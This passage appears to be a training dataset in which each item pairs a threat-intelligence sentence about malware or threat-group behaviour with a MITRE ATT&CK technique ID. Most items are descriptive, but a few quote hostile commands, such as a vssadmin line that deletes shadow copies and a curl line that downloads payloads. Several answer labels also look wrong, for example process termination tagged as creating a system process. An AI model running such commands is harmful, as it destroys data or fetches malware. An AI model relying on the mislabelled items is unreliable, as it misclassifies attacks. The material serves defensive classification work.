“click-worthy” or interesting topics to convince users to click links or open attachments that could lead to various threats### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERTON has used AES for encrypting C2 traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 used batch scripts to enumerate users on a victim domain controller.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Outlook rules allow a user to define automated behavior to manage email messages.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather information about the victim's organization that can be used during targeting.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has placed a plist file within the LaunchDaemons folder and launched it manually.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In this latest campaign, APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bisonal uses HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Keydnap prompts the users for credentials.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can determine the NetBios name and the IP addresses of targets machines including domain controllers.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WINERACK can enumerate files and directories.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,2e0361fd73f60c76c69806205307ccac, update.dll (MiniDuke), 425kb (internal name = “UserCache.dll“) 9e3f3b5e9ece79102d257e8cf982e09e, cache.dll (CozyDuke), 425kb (internal name = “UserCache.dll“) The two share identical export function names in their export directories, and the naming appears to be randomly assigned at compile time### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT can communicate with the C2 via subdomains that utilize base64 with character substitutions.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by Replication Through Removable Media.### Assistant: T1092: Communication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XAgent C2 Communications The macOS variant of XAgent has ability to receive commands from threat actors via its command and control channel, but is also capable of logging key strokes via its keylogger functionality### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EKANS stops processes related to security and management software.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once infected, victims will reach out to and be redirected by these resolvers.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoomBox has the ability to mask malicious data strings as PDF files.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used the get -b -e -p command for network scanning as well as a custom Python tool packed into a Windows executable named Get.exe to scan IP ranges for HTTP.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also has the ability to monitor the cryptocurrency miner file and process.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may buy and/or steal capabilities that can be used during targeting.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,[2] Threat groups use strategic web compromises (SWCs), also known as watering hole attacks, to target a wide array of potential victims### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ragnar Locker can delete volume shadow copies using vssadmin delete shadows /all /quiet.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These programs control flow of execution before the operating system takes control.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KEYMARBLE can obtain a list of running processes on the system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Briba uses rundll32 within Registry Run Keys / Startup Folder entries to execute malicious DLLs.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These solutions differ from other storage solutions in that there is no overarching application.### Assistant: T1530: Data from Cloud Storage Object" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner used a script to gather the IP address of the infected machine before sending to the C2.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has sent spearphishing attachments attempting to get a user to click.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SYNful Knock has the capability to add its own custom backdoor password when it modifies the operating system of the affected network device.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot decodes the configuration data and modules.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has used HKCU\Software\Microsoft\Windows\CurrentVersion\Run, HKLM\Software\Microsoft\Windows\CurrentVersion\Run, and the Startup folder to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can create and register a service for execution.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has the ability to decode and decrypt downloaded files.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can persist via startup options for Login items.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT18 uses HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One version of Helminth consists of VBScript scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used a forged duo-sid cookie to bypass MFA set on an email account.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique bypasses some multi-factor authentication protocols since the session is already authenticated.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sowbug named its tools to masquerade as Windows or Adobe Reader software, such as by using the file name adobecms.exe and the directory CSIDL_APPDATA\microsoft\security.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These malicious applications have been delivered through popups on legitimate websites.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNSPOT used Windows API functions such as MoveFileEx and NtQueryInformationProcess as part of the SUNBURST injection process.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot can terminate a specific process by its process id.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can enumerate the victim's desktop.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bisonal can obtain a list of running processes on the victim’s machine.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX/Shlayer uses the curl -fsL ""$url"" >$tmp_path command to download malicious payloads into a temporary directory.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JCry has created payloads in the Startup directory to maintain persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke installed a cron job that downloaded and executed files from the C2.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Accounts may be deleted, locked, or manipulated to remove access to accounts.### Assistant: T1531: Account Access Removal" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can measure the download speed on a targeted host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Seasalt has a command to delete a specified file.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FinFisher takes a screenshot of the screen and displays it on top of all other windows for few seconds in an apparent attempt to hide some messages showed by the system during the setup process.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Keylogging Functionality XAgent also has a keylogger functionality that allows the threat actors to steal credentials as the user types them### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike's ""beacon"" payload can collect information on process details.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBSRAT can compress data with ZLIB prior to sending it back to the C2 server.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also used the ping command.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CCBkdr was added to a legitimate, signed version 5.33 of the CCleaner software and distributed on CCleaner's distribution site.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI has the capability to perform keylogging.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used tools to exploit the ZeroLogon vulnerability .### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel for Linux has a command to download a file from and to a remote C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also uses AES128-CBC encrypted blobs for SUNBURST source code and data extracted from the SolarWinds Orion crypted_buffer; if ( i gt;= this-gt;crypted_buffer_size - 4 ) // this-gt;crypted_buffer_size == 15 break; ++i; crypted_buffer[i + 4] ^= crypted_buffer[i & 3]; The generated buffer in encoded using the BASE64 alphabet, where the last two characters are replaced with “-” and “_”### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor has communicated with its C2 servers via HTTPS protocol.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba can retrieve the ARP cache from the local system by using GetIpNetTable.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif droppers have used COM properties to execute malware in hidden windows.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM samples have been signed with a code-signing certificates.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Siloscape impersonates the main thread of CExecSvc.exe by calling NtImpersonateThread.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has utilized techniques like reflective DLL loading to write a DLL into memory and load a shell that provides backdoor access to the victim.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may encode data to make the content of command and control traffic more difficult to detect.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has used JavaScript and Node.Js information stealer script that exfiltrates data using the node process.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources.### Assistant: T1111: Two-Factor Authentication Interception" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SodaMaster has the ability to query the Registry to detect a key specific to VMware.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Night Dragon used pass-the-hash tools to gain usernames and passwords.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conti can delete Windows Volume Shadow Copies using vssadmin.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files.### Assistant: T1216: Signed Script Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It writes encrypted data to %APPDATA%\Intel\Skype.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malware used by Putter Panda attempts to terminate processes corresponding to two components of Sophos Anti-Virus .### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests, TONEDEAF supports collecting system information, uploading and downloading of files, and arbitrary shell command execution.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpeakUp uses the arp -a command.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Penquin will connect to C2 only after sniffing a ""magic packet"" value in TCP or UDP packets matching specific conditions.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel for Windows has a command to launch a remote shell and executes commands on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel for Linux can attempt to find a new C2 server if it receives an error.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkComet can steal data from the clipboard.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Variants of WEBC2 achieve persistence by using DLL search order hijacking, usually by copying the DLL file to %SYSTEMROOT% .### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has used WMI event subscriptions for persistence.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke searches for Microsoft Outlook data files with extensions .pst and .ost for collection and exfiltration.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify component firmware to persist on systems.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The payload then calls the VirtualAllocEx API to create a buffer in the newly hollowed process and the WriteProcessMemory API to write the supplied data buffer that contains the code to inject to this newly created buffer### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,H1N1 obfuscates C2 traffic with an altered version of base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, mmc C:\Users\foo\admintools.msc /a will open a custom, saved console msc file in author mode.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ProLock can use WMIC to execute scripts on targeted hosts.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has the ability to duplicate a token from ntprint.exe.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Doki has downloaded scripts from C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp can capture display screenshots with the screens_dll.dll plugin.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about business roles may also be exposed to adversaries via online or other accessible data sets or Search Victim-Owned Websites.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has modified data timestamps to mimic files that are in the same folder on a compromised host.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT injects into a newly spawned process created from a native Windows executable.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware WhiskeyDelta-Two contains a function that attempts to rename the administrator’s account.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This includes, but is not limited to, the following: AES encryption of network communication File management Functionality to download, upload, and execute files Keylogging Remote desktop access Remote webcam viewing Reverse proxy Browser and FTP client password recovery The images below are what a target user opening a malicious RTF document would see from within Microsoft Word### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If it finds one, it will copy the token and store it for later use.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It has changed the proxy configuration of a victim system by modifying the HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap registry.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StreamEx obfuscates some commands by using statically programmed fragments of strings when starting a DLL.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can automatically archive collected data.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADNEWS is capable of executing commands via cmd.exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control .### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gathering this information may reveal opportunities for other forms of reconnaissance or Search Open Websites/Domains, establishing operational resources or Obtain Capabilities, and/or initial access .### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kerrdown can download additional software including Cobalt Strike from servers on the victim's network.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Explosive can scan all .exe files located in the USB drive.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ProLock can use CVE-2019-0859 to escalate privileges on a compromised host.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GreyEnergy is packed for obfuscation.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar can delete files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kerberos TGS tickets are also known as service tickets.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This forces the OS to search its state table for a related TCP connection that has already been established.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Code signing certificates may be used to bypass security policies that require signed code to execute on a system.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon creates a new service named “ntssrv” to execute the payload.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pysa has modified the registry key “SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System” and added the ransom note.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NOKKI can collect the current timestamp of the victim's machine.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA551 has used rundll32.exe to load malicious DLLs.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group tools have registered Run keys in the registry to give malicious VBS files persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass uses PowerSploit to inject shellcode into PowerShell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can query HKEY_CURRENT_USER\Software\Microsoft\Office\\Excel\Security\AccessVBOM\ to determine if the security setting for restricting default programmatic access is enabled.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LiteDuke can use HTTP GET requests in C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sibot checked if the compromised system is configured to use proxies.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has deleted itself and associated artifacts from victim machines.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used modified versions of open source PHP web shells to maintain access, often adding ""Dinosaur"" references within the code.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bad Rabbit has used various Windows API calls.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They have manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bisonal checks if the malware was executed within a VMware environment.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,down_new has the ability to identify the MAC address of a compromised host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda can uninstall scripts and delete files to cover its track.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This tool was originally intended to aid defenders in simulating obfuscated PowerShell commands to better their defenses### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad parameter set to true and the Program parameter set to the malicious executable path.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM used Web shells and HTRAN for C2 and to exfiltrate data.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operators deploying Netwalker have used psexec to copy the Netwalker payload across accessible systems.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather information about the victim's network security appliances that can be used during targeting.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also directly modify the search order via DLL redirection, which after being enabled may cause a program to load a different DLL.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldFinder performed HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request traveled through.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has a component to check for running processes to look for web browsers.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has used Windows Registry modifications to specify a DLL payload.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAWKBALL can collect the OS version, architecture information, and computer name.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WannaCry will attempt to determine the local network segment it is a part of.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Andariel has attempted to lure victims into enabling malicious macros within email attachments.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq uses svchost.exe to execute a malicious DLL included in a new service group.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GuLoader has previously used RegAsm as a donor process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can determine the time on the victim machine via IPinfo.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BabyShark has used scheduled tasks to maintain persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar can also act as a webserver and listen for inbound HTTP requests through an exposed API.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dyre decrypts resources needed for targeting the victim.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bisonal has the capability to download files to execute on the victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This file is then copied to a filename of ‘Windows Update.lnk’, which is placed in the startup path previously identified### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elderwood has used exploitation of endpoint software, including Microsoft Internet Explorer Adobe Flash vulnerabilities, to gain execution.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TAINTEDSCRIBE can execute FileRecvWriteRand to append random bytes to the end of a file received from C2.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can check for artifacts of VirtualBox, Virtual PC and VMware environment, and terminate itself if they are detected.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority .### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has used WinRM to enable remote execution.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The IIS w3wp.exe process then loads the malicious DLL.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad has discovered system information including memory status, CPU frequency, OS versions, and volume serial numbers.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MegaCortex has added entries to the Registry for ransom contact information.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dacls can collect data on running and parent processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,yty communicates to the C2 server by retrieving a Google Doc.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hancitor has also extracted executables from ZIP files.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may transfer tools or other files between systems in a compromised environment.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound malware can list a victim's logical drives and the type, as well the total/free space of the fixed devices.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY has hashed most its code's functions and encrypted payloads with base64 and XOR.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK 